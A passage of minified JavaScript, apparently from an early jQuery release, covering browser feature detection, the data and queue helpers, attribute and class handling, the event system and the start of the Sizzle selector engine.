e=b.getElementsByTagName("*"),f=b.getElementsByTagName("a")[0],g=c.createElement("select"),h=g.appendChild(c.createElement("option")),i=b.getElementsByTagName("input")[0];if(e&&e.length&&f){d.support={leadingWhitespace:b.firstChild.nodeType===3,tbody:!b.getElementsByTagName("tbody").length,htmlSerialize:!!b.getElementsByTagName("link").length,style:/red/.test(f.getAttribute("style")),hrefNormalized:f.getAttribute("href")==="/a",opacity:/^0.55$/.test(f.style.opacity),cssFloat:!!f.style.cssFloat,checkOn:i.value==="on",optSelected:h.selected,deleteExpando:!0,optDisabled:!1,checkClone:!1,noCloneEvent:!0,noCloneChecked:!0,boxModel:null,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableHiddenOffsets:!0,reliableMarginRight:!0},i.checked=!0,d.support.noCloneChecked=i.cloneNode(!0).checked,g.disabled=!0,d.support.optDisabled=!h.disabled;var j=null;d.support.scriptEval=function(){if(j===null){var b=c.documentElement,e=c.createElement("script"),f="script"+d.now();try{e.appendChild(c.createTextNode("window."+f+"=1;"))}catch(g){}b.insertBefore(e,b.firstChild),a[f]?(j=!0,delete a[f]):j=!1,b.removeChild(e)}return j};try{delete b.test}catch(k){d.support.deleteExpando=!1}!b.addEventListener&&b.attachEvent&&b.fireEvent&&(b.attachEvent("onclick",function l(){d.support.noCloneEvent=!1,b.detachEvent("onclick",l)}),b.cloneNode(!0).fireEvent("onclick")),b=c.createElement("div"),b.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";var m=c.createDocumentFragment();m.appendChild(b.firstChild),d.support.checkClone=m.cloneNode(!0).cloneNode(!0).lastChild.checked,d(function(){var a=c.createElement("div"),b=c.getElementsByTagName("body")[0];if(b){a.style.width=a.style.paddingLeft="1px",b.appendChild(a),d.boxModel=d.support.boxModel=a.offsetWidth===2,"zoom"in a.style&&(a.style.display="inline",a.style.zoom=1,d.support.inlineBlockNeedsLayout=a.offsetWidth===2,a.style.display="",a.innerHTML="<div style='width:4px;'></div>",d.support.shrinkWrapBlocks=a.offsetWidth!==2),a.innerHTML="<table><tr><td style='padding:0;border:0;display:none'></td><td>t</td></tr></table>";var e=a.getElementsByTagName("td");d.support.reliableHiddenOffsets=e[0].offsetHeight===0,e[0].style.display="",e[1].style.display="none",d.support.reliableHiddenOffsets=d.support.reliableHiddenOffsets&&e[0].offsetHeight===0,a.innerHTML="",c.defaultView&&c.defaultView.getComputedStyle&&(a.style.width="1px",a.style.marginRight="0",d.support.reliableMarginRight=(parseInt(c.defaultView.getComputedStyle(a,null).marginRight,10)||0)===0),b.removeChild(a).style.display="none",a=e=null}});var n=function(a){var b=c.createElement("div");a="on"+a;if(!b.attachEvent)return!0;var d=a in b;d||(b.setAttribute(a,"return;"),d=typeof b[a]==="function");return d};d.support.submitBubbles=n("submit"),d.support.changeBubbles=n("change"),b=e=f=null}}();var g=/^(?:\{.*\}|\[.*\])$/;d.extend({cache:{},uuid:0,expando:"jQuery"+(d.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(a){a=a.nodeType?d.cache[a[d.expando]]:a[d.expando];return!!a&&!i(a)},data:function(a,c,e,f){if(d.acceptData(a)){var g=d.expando,h=typeof c==="string",i,j=a.nodeType,k=j?d.cache:a,l=j?a[d.expando]:a[d.expando]&&d.expando;if((!l||f&&l&&!k[l][g])&&h&&e===b)return;l||(j?a[d.expando]=l=++d.uuid:l=d.expando),k[l]||(k[l]={},j||(k[l].toJSON=d.noop));if(typeof c==="object"||typeof c==="function")f?k[l][g]=d.extend(k[l][g],c):k[l]=d.extend(k[l],c);i=k[l],f&&(i[g]||(i[g]={}),i=i[g]),e!==b&&(i[c]=e);if(c==="events"&&!i[c])return i[g]&&i[g].events;return h?i[c]:i}},removeData:function(b,c,e){if(d.acceptData(b)){var f=d.expando,g=b.nodeType,h=g?d.cache:b,j=g?b[d.expando]:d.expando;if(!h[j])return;if(c){var k=e?h[j][f]:h[j];if(k){delete k[c];if(!i(k))return}}if(e){delete h[j][f];if(!i(h[j]))return}var l=h[j][f];d.support.deleteExpando||h!=a?delete h[j]:h[j]=null,l?(h[j]={},g||(h[j].toJSON=d.noop),h[j][f]=l):g&&(d.support.deleteExpando?delete b[d.expando]:b.removeAttribute?b.removeAttribute(d.expando):b[d.expando]=null)}},_data:function(a,b,c){return d.data(a,b,c,!0)},acceptData:function(a){if(a.nodeName){var b=d.noData[a.nodeName.toLowerCase()];if(b)return b!==!0&&a.getAttribute("classid")===b}return!0}}),d.fn.extend({data:function(a,c){var e=null;if(typeof a==="undefined"){if(this.length){e=d.data(this[0]);if(this[0].nodeType===1){var f=this[0].attributes,g;for(var i=0,j=f.length;i<j;i++)g=f[i].name,g.indexOf("data-")===0&&(g=g.substr(5),h(this[0],g,e[g]))}}return e}if(typeof a==="object")return this.each(function(){d.data(this,a)});var k=a.split(".");k[1]=k[1]?"."+k[1]:"";if(c===b){e=this.triggerHandler("getData"+k[1]+"!",[k[0]]),e===b&&this.length&&(e=d.data(this[0],a),e=h(this[0],a,e));return e===b&&k[1]?this.data(k[0]):e}return this.each(function(){var b=d(this),e=[k[0],c];b.triggerHandler("setData"+k[1]+"!",e),d.data(this,a,c),b.triggerHandler("changeData"+k[1]+"!",e)})},removeData:function(a){return this.each(function(){d.removeData(this,a)})}}),d.extend({queue:function(a,b,c){if(a){b=(b||"fx")+"queue";var e=d._data(a,b);if(!c)return e||[];!e||d.isArray(c)?e=d._data(a,b,d.makeArray(c)):e.push(c);return e}},dequeue:function(a,b){b=b||"fx";var c=d.queue(a,b),e=c.shift();e==="inprogress"&&(e=c.shift()),e&&(b==="fx"&&c.unshift("inprogress"),e.call(a,function(){d.dequeue(a,b)})),c.length||d.removeData(a,b+"queue",!0)}}),d.fn.extend({queue:function(a,c){typeof a!=="string"&&(c=a,a="fx");if(c===b)return d.queue(this[0],a);return this.each(function(b){var e=d.queue(this,a,c);a==="fx"&&e[0]!=="inprogress"&&d.dequeue(this,a)})},dequeue:function(a){return this.each(function(){d.dequeue(this,a)})},delay:function(a,b){a=d.fx?d.fx.speeds[a]||a:a,b=b||"fx";return this.queue(b,function(){var c=this;setTimeout(function(){d.dequeue(c,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var j=/[\n\t\r]/g,k=/\s+/,l=/\r/g,m=/^(?:href|src|style)$/,n=/^(?:button|input)$/i,o=/^(?:button|input|object|select|textarea)$/i,p=/^a(?:rea)?$/i,q=/^(?:radio|checkbox)$/i;d.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"},d.fn.extend({attr:function(a,b){return d.access(this,a,b,!0,d.attr)},removeAttr:function(a,b){return this.each(function(){d.attr(this,a,""),this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(d.isFunction(a))return this.each(function(b){var c=d(this);c.addClass(a.call(this,b,c.attr("class")))});if(a&&typeof a==="string"){var b=(a||"").split(k);for(var c=0,e=this.length;c<e;c++){var f=this[c];if(f.nodeType===1)if(f.className){var g=" "+f.className+" ",h=f.className;for(var i=0,j=b.length;i<j;i++)g.indexOf(" "+b[i]+" ")<0&&(h+=" "+b[i]);f.className=d.trim(h)}else f.className=a}}return this},removeClass:function(a){if(d.isFunction(a))return this.each(function(b){var c=d(this);c.removeClass(a.call(this,b,c.attr("class")))});if(a&&typeof a==="string"||a===b){var c=(a||"").split(k);for(var e=0,f=this.length;e<f;e++){var g=this[e];if(g.nodeType===1&&g.className)if(a){var h=(" "+g.className+" ").replace(j," ");for(var i=0,l=c.length;i<l;i++)h=h.replace(" "+c[i]+" "," ");g.className=d.trim(h)}else g.className=""}}return this},toggleClass:function(a,b){var c=typeof a,e=typeof b==="boolean";if(d.isFunction(a))return this.each(function(c){var e=d(this);e.toggleClass(a.call(this,c,e.attr("class"),b),b)});return this.each(function(){if(c==="string"){var f,g=0,h=d(this),i=b,j=a.split(k);while(f=j[g++])i=e?i:!h.hasClass(f),h[i?"addClass":"removeClass"](f)}else if(c==="undefined"||c==="boolean")this.className&&d._data(this,"__className__",this.className),this.className=this.className||a===!1?"":d._data(this,"__className__")||""})},hasClass:function(a){var b=" "+a+" ";for(var c=0,d=this.length;c<d;c++)if((" "+this[c].className+" ").replace(j," ").indexOf(b)>-1)return!0;return!1},val:function(a){if(!arguments.length){var c=this[0];if(c){if(d.nodeName(c,"option")){var e=c.attributes.value;return!e||e.specified?c.value:c.text}if(d.nodeName(c,"select")){var f=c.selectedIndex,g=[],h=c.options,i=c.type==="select-one";if(f<0)return null;for(var j=i?f:0,k=i?f+1:h.length;j<k;j++){var m=h[j];if(m.selected&&(d.support.optDisabled?!m.disabled:m.getAttribute("disabled")===null)&&(!m.parentNode.disabled||!d.nodeName(m.parentNode,"optgroup"))){a=d(m).val();if(i)return a;g.push(a)}}if(i&&!g.length&&h.length)return d(h[f]).val();return g}if(q.test(c.type)&&!d.support.checkOn)return c.getAttribute("value")===null?"on":c.value;return(c.value||"").replace(l,"")}return b}var n=d.isFunction(a);return this.each(function(b){var c=d(this),e=a;if(this.nodeType===1){n&&(e=a.call(this,b,c.val())),e==null?e="":typeof e==="number"?e+="":d.isArray(e)&&(e=d.map(e,function(a){return a==null?"":a+""}));if(d.isArray(e)&&q.test(this.type))this.checked=d.inArray(c.val(),e)>=0;else if(d.nodeName(this,"select")){var f=d.makeArray(e);d("option",this).each(function(){this.selected=d.inArray(d(this).val(),f)>=0}),f.length||(this.selectedIndex=-1)}else this.value=e}})}}),d.extend({attrFn:{val:!0,css:!0,html:!0,text:!0,data:!0,width:!0,height:!0,offset:!0},attr:function(a,c,e,f){if(!a||a.nodeType===3||a.nodeType===8||a.nodeType===2)return b;if(f&&c in d.attrFn)return d(a)[c](e);var g=a.nodeType!==1||!d.isXMLDoc(a),h=e!==b;c=g&&d.props[c]||c;if(a.nodeType===1){var i=m.test(c);if(c==="selected"&&!d.support.optSelected){var j=a.parentNode;j&&(j.selectedIndex,j.parentNode&&j.parentNode.selectedIndex)}if((c in a||a[c]!==b)&&g&&!i){h&&(c==="type"&&n.test(a.nodeName)&&a.parentNode&&d.error("type property can't be changed"),e===null?a.nodeType===1&&a.removeAttribute(c):a[c]=e);if(d.nodeName(a,"form")&&a.getAttributeNode(c))return a.getAttributeNode(c).nodeValue;if(c==="tabIndex"){var k=a.getAttributeNode("tabIndex");return k&&k.specified?k.value:o.test(a.nodeName)||p.test(a.nodeName)&&a.href?0:b}return a[c]}if(!d.support.style&&g&&c==="style"){h&&(a.style.cssText=""+e);return a.style.cssText}h&&a.setAttribute(c,""+e);if(!a.attributes[c]&&(a.hasAttribute&&!a.hasAttribute(c)))return b;var l=!d.support.hrefNormalized&&g&&i?a.getAttribute(c,2):a.getAttribute(c);return l===null?b:l}h&&(a[c]=e);return a[c]}});var r=/\.(.*)$/,s=/^(?:textarea|input|select)$/i,t=/\./g,u=/ /g,v=/[^\w\s.|`]/g,w=function(a){return a.replace(v,"\\$&")};d.event={add:function(c,e,f,g){if(c.nodeType!==3&&c.nodeType!==8){try{d.isWindow(c)&&(c!==a&&!c.frameElement)&&(c=a)}catch(h){}if(f===!1)f=x;else if(!f)return;var i,j;f.handler&&(i=f,f=i.handler),f.guid||(f.guid=d.guid++);var k=d._data(c);if(!k)return;var l=k.events,m=k.handle;l||(k.events=l={}),m||(k.handle=m=function(a){return typeof d!=="undefined"&&d.event.triggered!==a.type?d.event.handle.apply(m.elem,arguments):b}),m.elem=c,e=e.split(" ");var n,o=0,p;while(n=e[o++]){j=i?d.extend({},i):{handler:f,data:g},n.indexOf(".")>-1?(p=n.split("."),n=p.shift(),j.namespace=p.slice(0).sort().join(".")):(p=[],j.namespace=""),j.type=n,j.guid||(j.guid=f.guid);var q=l[n],r=d.event.special[n]||{};if(!q){q=l[n]=[];if(!r.setup||r.setup.call(c,g,p,m)===!1)c.addEventListener?c.addEventListener(n,m,!1):c.attachEvent&&c.attachEvent("on"+n,m)}r.add&&(r.add.call(c,j),j.handler.guid||(j.handler.guid=f.guid)),q.push(j),d.event.global[n]=!0}c=null}},global:{},remove:function(a,c,e,f){if(a.nodeType!==3&&a.nodeType!==8){e===!1&&(e=x);var g,h,i,j,k=0,l,m,n,o,p,q,r,s=d.hasData(a)&&d._data(a),t=s&&s.events;if(!s||!t)return;c&&c.type&&(e=c.handler,c=c.type);if(!c||typeof c==="string"&&c.charAt(0)==="."){c=c||"";for(h in t)d.event.remove(a,h+c);return}c=c.split(" ");while(h=c[k++]){r=h,q=null,l=h.indexOf(".")<0,m=[],l||(m=h.split("."),h=m.shift(),n=new RegExp("(^|\\.)"+d.map(m.slice(0).sort(),w).join("\\.(?:.*\\.)?")+"(\\.|$)")),p=t[h];if(!p)continue;if(!e){for(j=0;j<p.length;j++){q=p[j];if(l||n.test(q.namespace))d.event.remove(a,r,q.handler,j),p.splice(j--,1)}continue}o=d.event.special[h]||{};for(j=f||0;j<p.length;j++){q=p[j];if(e.guid===q.guid){if(l||n.test(q.namespace))f==null&&p.splice(j--,1),o.remove&&o.remove.call(a,q);if(f!=null)break}}if(p.length===0||f!=null&&p.length===1)(!o.teardown||o.teardown.call(a,m)===!1)&&d.removeEvent(a,h,s.handle),g=null,delete t[h]}if(d.isEmptyObject(t)){var u=s.handle;u&&(u.elem=null),delete s.events,delete s.handle,d.isEmptyObject(s)&&d.removeData(a,b,!0)}}},trigger:function(a,c,e){var f=a.type||a,g=arguments[3];if(!g){a=typeof a==="object"?a[d.expando]?a:d.extend(d.Event(f),a):d.Event(f),f.indexOf("!")>=0&&(a.type=f=f.slice(0,-1),a.exclusive=!0),e||(a.stopPropagation(),d.event.global[f]&&d.each(d.cache,function(){var b=d.expando,e=this[b];e&&e.events&&e.events[f]&&d.event.trigger(a,c,e.handle.elem)}));if(!e||e.nodeType===3||e.nodeType===8)return b;a.result=b,a.target=e,c=d.makeArray(c),c.unshift(a)}a.currentTarget=e;var h=d._data(e,"handle");h&&h.apply(e,c);var i=e.parentNode||e.ownerDocument;try{e&&e.nodeName&&d.noData[e.nodeName.toLowerCase()]||e["on"+f]&&e["on"+f].apply(e,c)===!1&&(a.result=!1,a.preventDefault())}catch(j){}if(!a.isPropagationStopped()&&i)d.event.trigger(a,c,i,!0);else if(!a.isDefaultPrevented()){var k,l=a.target,m=f.replace(r,""),n=d.nodeName(l,"a")&&m==="click",o=d.event.special[m]||{};if((!o._default||o._default.call(e,a)===!1)&&!n&&!(l&&l.nodeName&&d.noData[l.nodeName.toLowerCase()])){try{l[m]&&(k=l["on"+m],k&&(l["on"+m]=null),d.event.triggered=a.type,l[m]())}catch(p){}k&&(l["on"+m]=k),d.event.triggered=b}}},handle:function(c){var e,f,g,h,i,j=[],k=d.makeArray(arguments);c=k[0]=d.event.fix(c||a.event),c.currentTarget=this,e=c.type.indexOf(".")<0&&!c.exclusive,e||(g=c.type.split("."),c.type=g.shift(),j=g.slice(0).sort(),h=new RegExp("(^|\\.)"+j.join("\\.(?:.*\\.)?")+"(\\.|$)")),c.namespace=c.namespace||j.join("."),i=d._data(this,"events"),f=(i||{})[c.type];if(i&&f){f=f.slice(0);for(var l=0,m=f.length;l<m;l++){var n=f[l];if(e||h.test(n.namespace)){c.handler=n.handler,c.data=n.data,c.handleObj=n;var o=n.handler.apply(this,k);o!==b&&(c.result=o,o===!1&&(c.preventDefault(),c.stopPropagation()));if(c.isImmediatePropagationStopped())break}}}return c.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(a){if(a[d.expando])return a;var e=a;a=d.Event(e);for(var f=this.props.length,g;f;)g=this.props[--f],a[g]=e[g];a.target||(a.target=a.srcElement||c),a.target.nodeType===3&&(a.target=a.target.parentNode),!a.relatedTarget&&a.fromElement&&(a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement);if(a.pageX==null&&a.clientX!=null){var h=c.documentElement,i=c.body;a.pageX=a.clientX+(h&&h.scrollLeft||i&&i.scrollLeft||0)-(h&&h.clientLeft||i&&i.clientLeft||0),a.pageY=a.clientY+(h&&h.scrollTop||i&&i.scrollTop||0)-(h&&h.clientTop||i&&i.clientTop||0)}a.which==null&&(a.charCode!=null||a.keyCode!=null)&&(a.which=a.charCode!=null?a.charCode:a.keyCode),!a.metaKey&&a.ctrlKey&&(a.metaKey=a.ctrlKey),!a.which&&a.button!==b&&(a.which=a.button&1?1:a.button&2?3:a.button&4?2:0);return a},guid:1e8,proxy:d.proxy,special:{ready:{setup:d.bindReady,teardown:d.noop},live:{add:function(a){d.event.add(this,H(a.origType,a.selector),d.extend({},a,{handler:G,guid:a.handler.guid}))},remove:function(a){d.event.remove(this,H(a.origType,a.selector),a)}},beforeunload:{setup:function(a,b,c){d.isWindow(this)&&(this.onbeforeunload=c)},teardown:function(a,b){this.onbeforeunload===b&&(this.onbeforeunload=null)}}}},d.removeEvent=c.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){a.detachEvent&&a.detachEvent("on"+b,c)},d.Event=function(a){if(!this.preventDefault)return new d.Event(a);a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||a.returnValue===!1||a.getPreventDefault&&a.getPreventDefault()?y:x):this.type=a,this.timeStamp=d.now(),this[d.expando]=!0},d.Event.prototype={preventDefault:function(){this.isDefaultPrevented=y;var a=this.originalEvent;a&&(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){this.isPropagationStopped=y;var a=this.originalEvent;a&&(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=y,this.stopPropagation()},isDefaultPrevented:x,isPropagationStopped:x,isImmediatePropagationStopped:x};var z=function(a){var b=a.relatedTarget;try{if(b&&b!==c&&!b.parentNode)return;while(b&&b!==this)b=b.parentNode;b!==this&&(a.type=a.data,d.event.handle.apply(this,arguments))}catch(e){}},A=function(a){a.type=a.data,d.event.handle.apply(this,arguments)};d.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){d.event.special[a]={setup:function(c){d.event.add(this,b,c&&c.selector?A:z,a)},teardown:function(a){d.event.remove(this,b,a&&a.selector?A:z)}}}),d.support.submitBubbles||(d.event.special.submit={setup:function(a,b){if(this.nodeName&&this.nodeName.toLowerCase()!=="form")d.event.add(this,"click.specialSubmit",function(a){var b=a.target,c=b.type;(c==="submit"||c==="image")&&d(b).closest("form").length&&E("submit",this,arguments)}),d.event.add(this,"keypress.specialSubmit",function(a){var b=a.target,c=b.type;(c==="text"||c==="password")&&d(b).closest("form").length&&a.keyCode===13&&E("submit",this,arguments)});else return!1},teardown:function(a){d.event.remove(this,".specialSubmit")}});if(!d.support.changeBubbles){var B,C=function(a){var b=a.type,c=a.value;b==="radio"||b==="checkbox"?c=a.checked:b==="select-multiple"?c=a.selectedIndex>-1?d.map(a.options,function(a){return a.selected}).join("-"):"":a.nodeName.toLowerCase()==="select"&&(c=a.selectedIndex);return c},D=function D(a){var c=a.target,e,f;if(s.test(c.nodeName)&&!c.readOnly){e=d._data(c,"_change_data"),f=C(c),(a.type!=="focusout"||c.type!=="radio")&&d._data(c,"_change_data",f);if(e===b||f===e)return;if(e!=null||f)a.type="change",a.liveFired=b,d.event.trigger(a,arguments[1],c)}};d.event.special.change={filters:{focusout:D,beforedeactivate:D,click:function(a){var b=a.target,c=b.type;(c==="radio"||c==="checkbox"||b.nodeName.toLowerCase()==="select")&&D.call(this,a)},keydown:function(a){var b=a.target,c=b.type;(a.keyCode===13&&b.nodeName.toLowerCase()!=="textarea"||a.keyCode===32&&(c==="checkbox"||c==="radio")||c==="select-multiple")&&D.call(this,a)},beforeactivate:function(a){var b=a.target;d._data(b,"_change_data",C(b))}},setup:function(a,b){if(this.type==="file")return!1;for(var c in B)d.event.add(this,c+".specialChange",B[c]);return s.test(this.nodeName)},teardown:function(a){d.event.remove(this,".specialChange");return s.test(this.nodeName)}},B=d.event.special.change.filters,B.focus=B.beforeactivate}c.addEventListener&&d.each({focus:"focusin",blur:"focusout"},function(a,b){function f(a){var c=d.event.fix(a);c.type=b,c.originalEvent={},d.event.trigger(c,null,c.target),c.isDefaultPrevented()&&a.preventDefault()}var e=0;d.event.special[b]={setup:function(){e++===0&&c.addEventListener(a,f,!0)},teardown:function(){--e===0&&c.removeEventListener(a,f,!0)}}}),d.each(["bind","one"],function(a,c){d.fn[c]=function(a,e,f){if(typeof a==="object"){for(var g in a)this[c](g,e,a[g],f);return this}if(d.isFunction(e)||e===!1)f=e,e=b;var h=c==="one"?d.proxy(f,function(a){d(this).unbind(a,h);return f.apply(this,arguments)}):f;if(a==="unload"&&c!=="one")this.one(a,e,f);else for(var i=0,j=this.length;i<j;i++)d.event.add(this[i],a,h,e);return this}}),d.fn.extend({unbind:function(a,b){if(typeof a!=="object"||a.preventDefault)for(var e=0,f=this.length;e<f;e++)d.event.remove(this[e],a,b);else for(var c in a)this.unbind(c,a[c]);return this},delegate:function(a,b,c,d){return this.live(b,c,d,a)},undelegate:function(a,b,c){return arguments.length===0?this.unbind("live"):this.die(b,null,c,a)},trigger:function(a,b){return this.each(function(){d.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0]){var c=d.Event(a);c.preventDefault(),c.stopPropagation(),d.event.trigger(c,b,this[0]);return c.result}},toggle:function(a){var b=arguments,c=1;while(c<b.length)d.proxy(a,b[c++]);return this.click(d.proxy(a,function(e){var f=(d._data(this,"lastToggle"+a.guid)||0)%c;d._data(this,"lastToggle"+a.guid,f+1),e.preventDefault();return b[f].apply(this,arguments)||!1}))},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});var F={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};d.each(["live","die"],function(a,c){d.fn[c]=function(a,e,f,g){var h,i=0,j,k,l,m=g||this.selector,n=g?this:d(this.context);if(typeof a==="object"&&!a.preventDefault){for(var o in a)n[c](o,e,a[o],m);return this}d.isFunction(e)&&(f=e,e=b),a=(a||"").split(" ");while((h=a[i++])!=null){j=r.exec(h),k="",j&&(k=j[0],h=h.replace(r,""));if(h==="hover"){a.push("mouseenter"+k,"mouseleave"+k);continue}l=h,h==="focus"||h==="blur"?(a.push(F[h]+k),h=h+k):h=(F[h]||h)+k;if(c==="live")for(var p=0,q=n.length;p<q;p++)d.event.add(n[p],"live."+H(h,m),{data:e,selector:m,handler:f,origType:h,origHandler:f,preType:l});else n.unbind("live."+H(h,m),f)}return this}}),d.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "),function(a,b){d.fn[b]=function(a,c){c==null&&(c=a,a=null);return arguments.length>0?this.bind(b,a,c):this.trigger(b)},d.attrFn&&(d.attrFn[b]=!0)}),function(){function u(a,b,c,d,e,f){for(var g=0,h=d.length;g<h;g++){var i=d[g];if(i){var j=!1;i=i[a];while(i){if(i.sizcache===c){j=d[i.sizset];break}if(i.nodeType===1){f||(i.sizcache=c,i.sizset=g);if(typeof b!=="string"){if(i===b){j=!0;break}}else if(k.filter(b,[i]).length>0){j=i;break}}i=i[a]}d[g]=j}}}function t(a,b,c,d,e,f){for(var g=0,h=d.length;g<h;g++){var i=d[g];if(i){var j=!1;i=i[a];while(i){if(i.sizcache===c){j=d[i.sizset];break}i.nodeType===1&&!f&&(i.sizcache=c,i.sizset=g);if(i.nodeName.toLowerCase()===b){j=i;break}i=i[a]}d[g]=j}}}var a=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^\[\]]*\]|['"][^'"]*['"]|[^\[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,e=0,f=Object.prototype.toString,g=!1,h=!0,i=/\\/g,j=/\W/;[0,0].sort(function(){h=!1;return 0});var k=function(b,d,e,g){e=e||[],d=d||c;var h=d;if(d.nodeType!==1&&d.nodeType!==9)return[];if(!b||typeof b!=="string")return e;var i,j,n,o,q,r,s,t,u=!0,w=k.isXML(d),x=[],y=b;do{a.exec(""),i=a.exec(y);if(i){y=i[3],x.push(i[1]);if(i[2]){o=i[3];break}}}while(i);if(x.length>1&&m.exec(b))if(x.length===2&&l.relative[x[0]])j=v(x[0]+x[1],d);else{j=l.relative[x[0]]?[d]:k(x.shift(),d);while(x.length)b=x.shift(),l.relative[b]&&(b+=x.shift()),j=v(b,j)}else{!g&&x.length>1&&d.nodeType===9&&!w&&l.match.ID.test(x[0])&&!l.match.ID.test(x[x.length-1])&&(q=k.find(x.shift(),d,w),d=q.expr?k.filter(q.expr,q.set)[0]:q.set[0]);if(d){q=g?{expr:x.pop(),set:p(g)}:k.find(x.pop(),x.length===1&&(x[0]==="~"||x[0]==="+")&&d.parentNode?d.parentNode:d,w),j=q.expr?k.filter(q.expr,q.set):q.set,x.length>0?n=p(j):u=!1;while(x.length)r=x.pop(),s=r,l.relative[r]?s=x.pop():r="",s==null&&(s=d),l.relative[r](n,s,w)}else n=x=[]}n||(n=j),n||k.error(r||b);if(f.call(n)==="[object Array]")if(u)if(d&&d.nodeType===1)for(t=0;n[t]!=null;t++)n[t]&&(n[t]===!0||n[t].nodeType===1&&k.contains(d,n[t]))&&e.push(j[t]);else for(t=0;n[t]!=null;t++)n[t]&&n[t].nodeType===1&&e.push(j[t]);else e.push.apply(e,n);else p(n,e);o&&(k(o,h,e,g),k.uniqueSort(e));return e};k.uniqueSort=function(a){if(r){g=h,a.sort(r);if(g)for(var b=1;b<a.length;b++)a[b]===a[b-1]&&a.splice(b--,1)}return a},k.matches=function(a,b){return k(a,null,null,b)},k.matchesSelector=function(a,b){return k(b,null,null,[a]).length>0},k.find=function(a,b,c){var d;if(!a)return[];for(var e=0,f=l.order.length;e<f;e++){var g,h=l.order[e];if(g=l.leftMatch[h].exec(a)){var j=g[1];g.splice(1,1);if(j.substr(j.length-1)!=="\\"){g[1]=(g[1]||"").replace(i,""),d=l.find[h](g,b,c);if(d!=null){a=a.replace(l.match[h],"");break}}}}d||(d=typeof b.getElementsByTagName!=="undefined"?b.getElementsByTagName("*"):[]);return{set:d,expr:a}},k.filter=function(a,c,d,e){var f,g,h=a,i=[],j=c,m=c&&c[0]&&k.isXML(c[0]);while(a&&c.length){for(var n in l.filter)if((f=l.leftMatch[n].exec(a))!=null&&f[2]){var o,p,q=l.filter[n],r=f[1];g=!1,f.splice(1,1);if(r.substr(r.length-1)==="\\")continue;j===i&&(i=[]);if(l.preFilter[n]){f=l.preFilter[n](f,j,d,i,e,m);if(f){if(f===!0)continue}else g=o=!0}if(f)for(var s=0;(p=j[s])!=null;s++)if(p){o=q(p,f,s,j);var t=e^!!o;d&&o!=null?t?g=!0:j[s]=!1:t&&(i.push(p),g=!0)}if(o!==b){d||(j=i),a=a.replace(l.match[n],"");if(!g)return[];break}}if(a===h)if(g==null)k.error(a);else break;h=a}return j},k.error=function(a){throw"Syntax error, unrecognized expression: "+a};var l=k.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF\-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF\-]|\\.)+)\s*(?:(\S?=)\s*(?:(['"])(.*?)\3|(#?(?:[\w\u00c0-\uFFFF\-]|\\.)*)|)|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*\-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\(\s*(even|odd|(?:[+\-]?\d+|(?:[+\-]?\d*)?n\s*(?:[+\-]\s*\d+)?))\s*\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^\-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF\-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(a){return a.getAttribute("href")},type:function(a){return a.getAttribute("type")}},relative:{"+":function(a,b){var c=typeof b==="string",d=c&&!j.test(b),e=c&&!d;d&&(b=b.toLowerCase());for(var f=0,g=a.length,h;f<g;f++)if(h=a[f]){while((h=h.previousSibling)&&h.nodeType!==1){}a[f]=e||h&&h.nodeName.toLowerCase()===b?h||!1:h===b}e&&k.filter(b,a,!0)},">":function(a,b){var c,d=typeof b==="string",e=0,f=a.length;if(d&&!j.test(b)){b=b.toLowerCase();for(;e<f;e++){c=a[e];if(c){var g=c.parentNode;a[e]=g.nodeName.toLowerCase()===b?g:!1}}}else{for(;e<f;e++)c=a[e],c&&(a[e]=d?c.parentNode:c.parentNode===b);d&&k.filter(b,a,!0)}},"":function(a,b,c){var d,f=e++,g=u;typeof b==="string"&&!j.test(b)&&(b=b.toLowerCase(),d=b,g=t),g("parentNode",b,f,a,d,c)},"~":function(a,b,c){var d,f=e++,g=u;typeof b==="string"&&!j.test(b)&&(b=b.toLowerCase(),d=b,g=t),g("previousSibling",b,f,a,d,c)}},find:{ID:function(a,b,c){if(typeof b.getElementById!=="undefined"&&!c){var d=b.getElementById(a[1]);return d&&d.parentNode?[d]:[]}},NAME:function(a,b){if(typeof 